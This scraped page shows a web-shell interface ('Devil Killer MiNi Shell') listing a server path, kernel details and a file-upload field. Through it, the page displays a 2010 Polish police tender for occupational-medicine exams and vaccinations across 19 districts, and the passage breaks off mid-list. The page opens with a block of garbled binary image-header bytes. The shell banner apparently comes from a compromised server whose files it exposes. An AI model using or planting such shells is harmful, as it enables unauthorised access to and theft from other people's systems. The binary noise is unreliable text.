JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100226/53952-N-2010.html

<p class="kh_header"><b>Olsztyn: Świadczenie usług medycznych z zakresu medycyny pracy.</b><br>
<b>Numer ogłoszenia: 53952 - 2010; data zamieszczenia: 26.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Partyzantów 6/8, 10-959 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5225200, 5225760, faks 089 5225205.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warminsko-mazurska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług medycznych z zakresu medycyny pracy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy funkcjonariuszy i pracowników Policji garnizonu warmińsko-mazurskiego oraz funkcjonariuszy i pracowników komórek terenowych i stanowisk samodzielnych KGP obejmujących:
1.1 badania lekarskie i niezbędne badania laboratoryjne oraz wydawanie na tej podstawie zaświadczeń lekarskich o braku bądź istnieniu przeciwwskazań do pracy na zajmowanym stanowisku, poprzez:
a. badania profilaktyczne, okresowe i kontrolne policjantów i pracowników Policji zwanych dalej Pracownikami,
  b. badania wstępne kandydatów do pracy w Policji,
  c. badania przy zmianie warunków służby/pracy,
  d. badania do celów sanitarno-epidemiologicznych - z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii,
e. badania kierowców, kierujących pojazdami uprzywilejowanymi w ruchu lądowym oraz stermotorzystów - z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie;
f)wykonywanie lekarskich badań kontrolnych po zakończonej profilaktyce poekspozycyjnej na zakażenie HIV,HBV,HCV;
g)wykonywanie odrębnych badań przez lekarzy specjalistów ( min. okulistyczne, laryngologiczne, neurologiczne, psychologiczne, psychiatryczne) i wydawanie na tej podstawie zaświadczeń lekarskich przez lekarza medycyny pracy, gdy jest to uzasadnione zgłoszeniem przez pracownika pogorszenia stanu zdrowia, w stopniu utrudniającym wykonywanie pracy/służby na zajmowanym stanowisku;
h)wykonywanie odrębnych badań na polecenie uprawnionych organów inspekcji pracy i inspekcji sanitarnej;
i)wykonywanie szczepień ochronnych Pracowników (w tym przeprowadzanie kwalifikacyjnego badania lekarskiego, wydawanie książeczek szczepień oraz informowanie Pracowników o terminach kolejnych dawek szczepionki) przeciwko:
-wirusowemu zapaleniu wątroby typu B (WZW B),
-laseczkom tężca z błonicą,
-laseczkom tężca (TD),
-kleszczowemu zapaleniu mózgu(FSME- IMMUN),
2. Wykonawca zobowiązany jest do:

a)zapewnienia udziału lekarzy  uprawnionych do przeprowadzania badań profilaktycznych w komisjach bezpieczeństwa i higieny pracy powołanych przez Zamawiającego, lekarzy uprawnionych do badania kierowców oraz innych lekarzy specjalistów, personelu medycznego (pielęgniarek).
b)prowadzenia analiz stanu zdrowia Pracowników, w tym zaliczanych do grup ryzyka i składanie Zamawiającemu w formie pisemnej rocznych informacji do 31 grudnia każdego roku kalendarzowego, oraz na 30 dni przed upływem ważności umowy,
c)prowadzenia na wydzielonym dysku twardym, imiennej kartoteki komputerowej Pracowników (baza danych, do której obsługi niezbędny jest system operacyjny Windows XP i program narzędziowy Excel) objętych badaniami i szczepieniami ochronnymi, obejmującej następujące dane:
- imię i nazwisko,
- nazwa jednostki zlecającej badanie/szczepienie,
- datę wyznaczenia badania/szczepienia,
- datę przeprowadzenia badania/szczepienia,
- rodzaj wykonanych badań/szczepień,
- datę wydania i datę ważności zaświadczenia,
- datę wykonania i datę ważności szczepienia,
d)prowadzenia dokumentacji medycznej oraz komputerowej kartoteki, o której mowa w pkt. c, chronienia jej i udostępniania zgodnie z Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 15 września 1997 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy oraz sposobu jej prowadzenia i przechowywania (Dz. U. Nr 120, poz. 768 z późn. zm.) oraz Rozporządzeniem Ministra Zdrowia z dnia 19 grudnia 2002 r. w sprawie wykazu obowiązkowych szczepień ochronnych oraz zasad przeprowadzania i dokumentacji szczepień (Dz. U. Nr 237, poz. 2018 z późn. zm.).
3.W przypadku rozwiązania umowy lub upływu terminu jej obowiązywania, Wykonawca w terminie14 dni licząc od daty pisemnego (dopuszcza się drogę faksową) wezwania przez Zamawiającego, zobowiązany jest do protokólarnego przekazania podmiotowi wskazanemu przez Zamawiającego:
a) dokumentacji medycznej Pracowników,
b) imiennej kartoteki komputerowej Pracowników - na wydzielonym dysku twardym.
4. Zamawiający wymaga aby badania, o których mowa w pkt 1, wykonywane były w jednej placówce medycznej Wykonawcy, na terenie miasta (odpowiednio dla każdej jednostki Policji) , czynnej w dni robocze od poniedziałku do piątku, w godzinach co najmniej od 08.00 do 16.00.
5.  Placówka medyczna o której mowa w pkt. 4, powinna posiadać:
-gabinety w ilości odpowiedniej do ilości oddelegowanych lekarzy, skierowanych do realizacji zadań wynikających z umowy,
-gabinet zabiegowy, w którym Wykonawca zapewni co najmniej w godzinach 08.00 - 11.00 pobieranie materiału do badań laboratoryjnych,
-pracownię RTG (duży obrazek),
-pracownię EKG.
6. Przedmiot zamówienia został podzielony przez Zamawiającego na oddzielnych 19 zadań, obejmujących realizację przedmiotu zamówienia na potrzeby:

Zadanie nr 1-KWP/KMP/Olsztyn oraz oraz funkcjonariusze i pracownicy komórek terenowych i stanowisk samodzielnych KGP.
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-1 216
2.Kontrolne policjantów-100;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-128;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-13;
5.Wstępne kandydatów do pracy w policji-6;
6.Okresowe pracowników Policji-300;
7.Kontrolne pracowników Policji-15;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-930;
Tężec/Tężec z błonicą;232;
FSME-450

Zadanie Nr 2- KPP Bartoszyce

Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-111;
2.Kontrolne policjantów-4;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-16;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-2;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-11;
7.Kontrolne pracowników Policji-3;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-51;
Tężec/Tężec z błonicą;0;
FSME-0

Zadanie Nr 3- KPP Braniewo
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-28;
2.Kontrolne policjantów-10;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-18;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-0;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-9;
7.Kontrolne pracowników Policji-5;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-180;
Tężec/Tężec z błonicą;89;
FSME-4

Zadanie Nr 4-KPP Działdowo
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-88;
2.Kontrolne policjantów-7;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-14;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-0;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-6;
7.Kontrolne pracowników Policji-3;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-89;
Tężec/Tężec z błonicą;49
FSME-7

Zadanie Nr 5- KMP Elbląg 
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-173;
2.Kontrolne policjantów-47;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-53;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-6;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-70;
7.Kontrolne pracowników Policji-10;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-16;
Tężec/Tężec z błonicą-3;
FSME-3

Zadanie Nr 6- KPP Ełk
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-116;
2.Kontrolne policjantów-2;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-17;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-2;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-11;
7.Kontrolne pracowników Policji-0;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-146;
Tężec/Tężec z błonicą-52;
FSME-0

Zadanie Nr 7-KPP Giżycko

Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-95;
2.Kontrolne policjantów-6;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-14;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-4;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-21;
7.Kontrolne pracowników Policji-2;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-113;
Tężec/Tężec z błonicą-37;
FSME-0

Zadanie Nr 8-KPP Gołdap
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-48;
2.Kontrolne policjantów-5;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-4;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-10;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-6;
7.Kontrolne pracowników Policji-1;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-50;
Tężec/Tężec z błonicą-52;
FSME-52

Zadanie 9- KPP Iława
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-144;
2.Kontrolne policjantów-8;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-5;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-6;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-18;
7.Kontrolne pracowników Policji-1;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-153;
Tężec/Tężec z błonicą-153;
FSME-2

Zadanie Nr 10- KPP Kętrzyn
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-132;
2.Kontrolne policjantów-9;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-25;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-0;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-17;
7.Kontrolne pracowników Policji-1;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-40;
Tężec/Tężec z błonicą-81
FSME-3

 Zadanie Nr 11- KPP Lidzbark Warmiński
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-64;
2.Kontrolne policjantów-9;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-11;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-3;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-14;
7.Kontrolne pracowników Policji-0;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-68;
Tężec/Tężec z błonicą-11;
FSME-3

Zadanie Nr 12-KPP Mrągowo
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-80;
2.Kontrolne policjantów-11;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-9;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-5;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-5;
7.Kontrolne pracowników Policji-2;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-105;
Tężec/Tężec z błonicą-42;
FSME-5

Zadanie Nr 13-KPP Nidzica
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-79;
2.Kontrolne policjantów-0;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-15;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-6;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-12;
7.Kontrolne pracowników Policji-2;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-79;
Tężec/Tężec z błonicą-19;
FSME-7

Zadanie Nr 14-KPP Nowe M. Lubawskie
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-66;
2.Kontrolne policjantów-4;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-26;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-15;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-10;
7.Kontrolne pracowników Policji-0;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-69;
Tężec/Tężec z błonicą-69;
FSME-7

Zadanie Nr 15-KPP Olecko
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-54;
2.Kontrolne policjantów-4;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-6;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-4;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-10;
7.Kontrolne pracowników Policji-2;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-10;
Tężec/Tężec z błonicą-10;
FSME-10

Zadanie Nr 16-KPP Ostróda
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-175;
2.Kontrolne policjantów-7;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-25;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-16;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-23;
7.Kontrolne pracowników Policji-2;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-202;
Tężec/Tężec z błonicą-201;
FSME-201

Zadanie Nr 17-KPP Pisz
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-87;
2.Kontrolne policjantów-8;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-10;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-0;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-20;
7.Kontrolne pracowników Policji-2;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-204;
Tężec/Tężec z błonicą-93;
FSME-14

Zadanie Nr 18-KPP Szczytno
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-117;
2.Kontrolne policjantów-8;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-18;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-7;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-13;
7.Kontrolne pracowników Policji-3;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-9;
Tężec/Tężec z błonicą-55;
FSME-0

Zadanie Nr 19-KPP Węgorzewo
Szacunkowa ilość usług odpowiednio do rodzaju badania:
1.Okresowe policjantów-46;
2.Kontrolne policjantów-7;
3.Kierowców prowadzących pojazdy uprzywilejowane w ruchu lądowym oraz ster motorzystów (z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie)-9;
4.Do celów sanitarno -epidemiologicznych z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii-10;
5.Wstępne kandydatów do pracy w policji-1;
6.Okresowe pracowników Policji-11;
7.Kontrolne pracowników Policji-2;
8.Zmiana warunków służby/pracy-1;
9.Kontrolne po zakończonej profilaktyce poekspozycyjnej na  zakażenie HIV-1
Szacunkowa ilość usług-szczepień:
WZW B-56;
Tężec/Tężec z błonicą-17;
FSME-0
Określone ilości usług (odpowiednio do rodzaju), przyjęte zostały przez Zamawiającego szacunkowo, w celu wyliczenia przez Wykonawcę ceny oferty i  nie może być podstawą roszczeń ze strony Wykonawcy w razie mniejszej liczby zleceń w trakcie realizacji umowy.Faktyczna ilość zlecanych usług wynikać będzie z rzeczywistych potrzeb Zamawiającego w tym zakresie.
7. Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może przedstawić ofertę obejmującą dowolną ilość części przedmiotu zamówienia, tj. na określone przez Zamawiającego zadania częściowe lub ofertę obejmującą cały przedmiot zamówienia. 
8. Zamawiający nie dopuszcza składania ofert wariantowych.
9. Zamawiający dopuszcza możliwość powierzenia Podwykonawcy części zamówienia w zakresie wykonywania badań laboratoryjnych w przypadku braku laboratorium w placówce Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy funkcjonariuszy i pracowników Policji garnizonu warmińsko-mazurskiego oraz funkcjonariuszy i pracowników komórek terenowych i stanowisk samodzielnych KGP obejmujących:
1.1 badania lekarskie i niezbędne badania laboratoryjne oraz wydawanie na tej podstawie zaświadczeń lekarskich o braku bądź istnieniu przeciwwskazań do pracy na zajmowanym stanowisku, poprzez:
a. badania profilaktyczne, okresowe i kontrolne policjantów i pracowników Policji zwanych dalej Pracownikami,
  b. badania wstępne kandydatów do pracy w Policji,
  c. badania przy zmianie warunków służby/pracy,
  d. badania do celów sanitarno-epidemiologicznych - z wyłączeniem badań laboratoryjnych na nosicielstwo bakterii,
e. badania kierowców, kierujących pojazdami uprzywilejowanymi w ruchu lądowym oraz stermotorzystów - z wyłączeniem badań psychologicznych dla KWP/KMP w Olsztynie;
f)wykonywanie lekarskich badań kontrolnych po zakończonej profilaktyce poekspozycyjnej na zakażenie HIV,HBV,HCV;
g)wykonywanie odrębnych badań przez lekarzy specjalistów ( min. okulistyczne, laryngologiczne, neurologiczne, psychologiczne, psychiatryczne) i wydawanie na tej podstawie zaświadczeń lekarskich przez lekarza medycyny pracy, gdy jest to uzasadnione zgłoszeniem przez pracownika pogorszenia stanu zdrowia, w stopniu utrudniającym wykonywanie pracy/służby na zajmowanym stanowisku;
h)wykonywanie odrębnych badań na polecenie uprawnionych organów inspekcji pracy i inspekcji sanitarnej;
i)wykonywanie szczepień ochronnych Pracowników (w tym przeprowadzanie kwalifikacyjnego badania lekarskiego, wydawanie książeczek szczepień oraz informowanie Pracowników o terminach kolejnych dawek szczepionki) przeciwko:
-wirusowemu zapaleniu wątroby typu B (WZW B),
-laseczkom tężca z błonicą,
-laseczkom tężca (TD),
-kleszczowemu zapaleniu mózgu(FSME- IMMUN),
2. Wykonawca zobowiązany jest do:
a)zapewnienia udziału lekarzy  uprawnionych do przeprowadzania badań profilaktycznych w komisjach bezpieczeństwa i higieny pracy powołanych przez Zamawiającego, lekarzy uprawnionych do badania kierowców oraz innych lekarzy specjalistów, personelu medycznego (pielęgniarek).
